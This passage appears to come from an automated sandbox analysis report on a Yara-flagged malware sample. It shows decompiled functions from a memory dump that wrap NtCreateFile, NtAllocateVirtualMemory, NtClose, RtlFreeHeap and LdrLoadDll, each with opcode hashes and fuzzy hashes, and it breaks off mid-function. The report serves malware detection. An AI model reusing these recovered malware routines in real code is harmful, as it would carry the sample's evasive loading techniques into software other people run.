                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                              • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                              • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004181BB, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E004181BB(void* __eax, void* __ecx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t25;

				asm("stosb");
				_t19 = _a4;
				_t6 = _t19 + 0xc40; // 0xc40
				E00418DC0(__edi, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}




                                                                                                                                                              0x004181bd
                                                                                                                                                              0x004181c3
                                                                                                                                                              0x004181cf
                                                                                                                                                              0x004181d7
                                                                                                                                                              0x0041820d
                                                                                                                                                              0x00418211

                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 19dde4529df738f92bf84e81a2c4b6cd612314efcab7e27918aad0b5c64d8a97
                                                                                                                                                              • Instruction ID: e734eda6658808a1bd32a1d4e6f71ea5f796a94c7d60e04da3eee2075b7717f5
                                                                                                                                                              • Opcode Fuzzy Hash: 19dde4529df738f92bf84e81a2c4b6cd612314efcab7e27918aad0b5c64d8a97
                                                                                                                                                              • Instruction Fuzzy Hash: 50F03CB2204149ABCB08DF98DC84CEB7BE9BF8C314B14864DFA5D93201D630E851CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041839D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0041839D(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E00418DC0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                                                                                                                              0x004183a3
                                                                                                                                                              0x004183af
                                                                                                                                                              0x004183b7
                                                                                                                                                              0x004183d9
                                                                                                                                                              0x004183dd

                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: 337debef2460efe0f3762fea0babc2a24c5fe849a6b560e2b09440f3d596a869
                                                                                                                                                              • Instruction ID: 91df1fac3f560b7affcfff4e3b39b967a4d3e7d672431698d67987694753e6bc
                                                                                                                                                              • Opcode Fuzzy Hash: 337debef2460efe0f3762fea0babc2a24c5fe849a6b560e2b09440f3d596a869
                                                                                                                                                              • Instruction Fuzzy Hash: B3F01CB1200108AFDB14DF89DC81EE777ADAF98354F118649FA0D97241C630E811CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                              0x004183af
                                                                                                                                                              0x004183b7
                                                                                                                                                              0x004183d9
                                                                                                                                                              0x004183dd

                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                              • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                              • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004182EA(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t16;

				asm("popad");
				asm("cmpsd");
				asm("enter 0x55bb, 0x8b");
				_t8 = _a4;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x409743
				E00418DC0(_t16, _a4, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}





                                                                                                                                                              0x004182ea
                                                                                                                                                              0x004182eb
                                                                                                                                                              0x004182ee
                                                                                                                                                              0x004182f3
                                                                                                                                                              0x004182f6
                                                                                                                                                              0x004182ff
                                                                                                                                                              0x00418307
                                                                                                                                                              0x00418315
                                                                                                                                                              0x00418319

                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 26eea605d614eb42a5c1e74c9289c06e68f3fe613bdcfe626341d71b1dbd8884
                                                                                                                                                              • Instruction ID: c9cb421f18702700d531dd65f01477e351dfcd46f1cf2d727dce32871bb0753e
                                                                                                                                                              • Opcode Fuzzy Hash: 26eea605d614eb42a5c1e74c9289c06e68f3fe613bdcfe626341d71b1dbd8884
                                                                                                                                                              • Instruction Fuzzy Hash: 95E08CB62402106FD714DF98CC49EE73B29EF45260F244599FA49EB282C670E6028AD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                              0x004182f3
                                                                                                                                                              0x004182f6
                                                                                                                                                              0x004182ff
                                                                                                                                                              0x00418307
                                                                                                                                                              0x00418315
                                                                                                                                                              0x00418319

                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                              • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                              • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004184C2, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004184C2(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, void* _a8, int _a12, void* _a16) {
				char _t17;

				asm("xlatb");
				asm("fsubrp st5, st0");
				asm("in al, dx");
				if(__eflags < 0) {
					E00418DC0(__eax, __edi, __edi + 0xc7c, 0xcb40a710, 0, 0x36);
					ExitProcess(_a12);
				}
				asm("ficomp word [edx+0x55]");
				_t14 = _a4;
				_t4 = _t14 + 0xc74; // 0xc74
				E00418DC0(__eax, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}




                                                                                                                                                              0x004184c7
                                                                                                                                                              0x004184c9
                                                                                                                                                              0x004184cb
                                                                                                                                                              0x004184cc
                                                                                                                                                              0x0041852a
                                                                                                                                                              0x00418538
                                                                                                                                                              0x00418538
                                                                                                                                                              0x004184ce
                                                                                                                                                              0x004184d3
                                                                                                                                                              0x004184df
                                                                                                                                                              0x004184e7
                                                                                                                                                              0x004184fd
                                                                                                                                                              0x00418501

                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitFreeHeapProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1180424539-0
                                                                                                                                                              • Opcode ID: 7f9261ba0bc6b0cd916af7b6e6accc6aa4b6cb2839bd5c38af30cf1a20ae24f3
                                                                                                                                                              • Instruction ID: 336a24befa922a063b9048b6daa1e313c500f060d366f48d004d60068fe4ef42
                                                                                                                                                              • Opcode Fuzzy Hash: 7f9261ba0bc6b0cd916af7b6e6accc6aa4b6cb2839bd5c38af30cf1a20ae24f3
                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0A4B16002007FD724EF54CC45ED73369EF84350F11855EF9185B281DA31E9418AE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                              0x00409b3c
                                                                                                                                                              0x00409b3f
                                                                                                                                                              0x00409b44
                                                                                                                                                              0x00409b49
                                                                                                                                                              0x00409b53
                                                                                                                                                              0x00409b58
                                                                                                                                                              0x00409b5b
                                                                                                                                                              0x00409b5d
                                                                                                                                                              0x00409b65
                                                                                                                                                              0x00409b6a
                                                                                                                                                              0x00409b6a
                                                                                                                                                              0x00409b71
                                                                                                                                                              0x00409b79
                                                                                                                                                              0x00409b7c
                                                                                                                                                              0x00409b7e
                                                                                                                                                              0x00409b92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409b94
                                                                                                                                                              0x00409b9a
                                                                                                                                                              0x00409b4e
                                                                                                                                                              0x00409b4e
                                                                                                                                                              0x00409b4e

                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00418621(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t14;
				void* _t21;

				_push(es);
				_t11 = _v0;
				_t3 = _t11 + 0xc8c; // 0x8bec97e1
				E00418DC0(_t21, _v0, _t3,  *((intOrPtr*)(_v0 + 0xa18)), 0, 0x46);
